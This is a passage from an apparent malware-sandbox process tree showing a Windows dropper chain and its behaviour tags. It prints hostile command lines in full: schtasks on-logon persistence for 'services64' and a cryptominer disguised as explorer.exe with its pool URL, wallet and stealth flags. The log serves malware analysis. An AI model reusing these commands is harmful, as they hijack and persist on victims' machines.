                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\24-7fa0d-d90-ad598-73430ff05b5ad\Xaewevebaeqo.exe"
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        PID:4208
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k5o00dvp.l3y\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:6432
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\k5o00dvp.l3y\GcleanerEU.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\k5o00dvp.l3y\GcleanerEU.exe /eufive
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:6724
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 284
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                PID:7964
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d4yor1ll.txz\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:7424
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\d4yor1ll.txz\installer.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\d4yor1ll.txz\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                PID:7548
                                                                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\d4yor1ll.txz\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\d4yor1ll.txz\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631210722 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                  PID:2608
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qfzs2lyy.aka\anyname.exe & exit
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:7988
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\qfzs2lyy.aka\anyname.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\qfzs2lyy.aka\anyname.exe
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:5056
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lfwo22wa.xbg\Vidboxinc.exe & exit
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:3856
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lfwo22wa.xbg\Vidboxinc.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\lfwo22wa.xbg\Vidboxinc.exe
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:5512
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 292
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                      PID:5568
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wm4zm1n0.wfo\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:3228
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wm4zm1n0.wfo\gcleaner.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\wm4zm1n0.wfo\gcleaner.exe /mixfive
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:2372
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 284
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                        PID:5552
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rsaiop4h.lq4\autosubplayer.exe /S & exit
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:3232
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                          PID:3540
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun05d60bc3b96248e5.exe
                                                                                                                                                                                                            Sun05d60bc3b96248e5.exe
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:1172
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1604
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                              PID:3020
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                          PID:4944
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun059375dac544fc4a.exe
                                                                                                                                                                                                            Sun059375dac544fc4a.exe
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:1180
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:3920
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                PID:4020
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:4720
                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                      PID:5952
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                    PID:4528
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                        PID:6176
                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:6260
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:6192
                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                          PID:2260
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:1492
                                                                                                                                                                                                                      • C:\ProgramData\7933844.exe
                                                                                                                                                                                                                        "C:\ProgramData\7933844.exe"
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                        PID:5660
                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 5660 -s 2328
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                          PID:1884
                                                                                                                                                                                                                      • C:\ProgramData\6138621.exe
                                                                                                                                                                                                                        "C:\ProgramData\6138621.exe"
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:5792
                                                                                                                                                                                                                      • C:\ProgramData\3226877.exe
                                                                                                                                                                                                                        "C:\ProgramData\3226877.exe"
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                        PID:6000
                                                                                                                                                                                                                        • C:\ProgramData\3226877.exe
                                                                                                                                                                                                                          "C:\ProgramData\3226877.exe"
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                          PID:1452
                                                                                                                                                                                                                      • C:\ProgramData\1091956.exe
                                                                                                                                                                                                                        "C:\ProgramData\1091956.exe"
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                        PID:4680
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 2368
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                          PID:2176
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                      PID:2136
                                                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 2136 -s 1724
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                        PID:6112
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5228
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5228 -s 608
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:2236
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5332
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 312
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                        PID:5680
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5464
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-NF9VA.tmp\setup_2.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-NF9VA.tmp\setup_2.tmp" /SL5="$1021A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        PID:5728
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:5968
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-NRK00.tmp\setup_2.tmp
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-NRK00.tmp\setup_2.tmp" /SL5="$10226,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                            PID:5148
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-A12KQ.tmp\postback.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-A12KQ.tmp\postback.exe" ss1
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:5948
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5760
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:3776
                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                            PID:1156
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:5928
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:6120
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                    PID:1632
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun05640630a6aa.exe
                                                                                                                                                                                                                      Sun05640630a6aa.exe
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:1472
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                    PID:1036
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun05fa3b4d2ae56e.exe
                                                                                                                                                                                                                      Sun05fa3b4d2ae56e.exe /mixone
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:3868
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 240
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:1452
                                                                                                                                                                                                            • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                              C:\Windows\System32\sihclient.exe /cv qZIHR0hrq02NvNbKVX1Y/g.0.2
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              PID:1628
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1156 -ip 1156
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                              PID:2508
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1704 -ip 1704
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                              PID:5096
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3868 -ip 3868
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                              PID:3304
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1268 -ip 1268
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                              PID:4580
                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 660 -p 2136 -ip 2136
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                              PID:5668
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1172 -ip 1172
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                              PID:6020
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5316 -ip 5316
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                              PID:6060
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5228 -ip 5228
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                              PID:2564
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:2392
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 452
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                PID:3164
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6000 -ip 6000
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5952
                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                PID:6008
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2392 -ip 2392
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                PID:5876
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5332 -ip 5332
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                PID:1360
                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                PID:5960
                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  PID:5432
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 460
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    PID:4664
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5432 -ip 5432
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                PID:5300
                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 584 -p 5660 -ip 5660
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                PID:72
                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 648 -p 1648 -ip 1648
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4528
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5496 -ip 5496
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                  PID:5376
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4680 -ip 4680
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                  PID:5740
                                                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
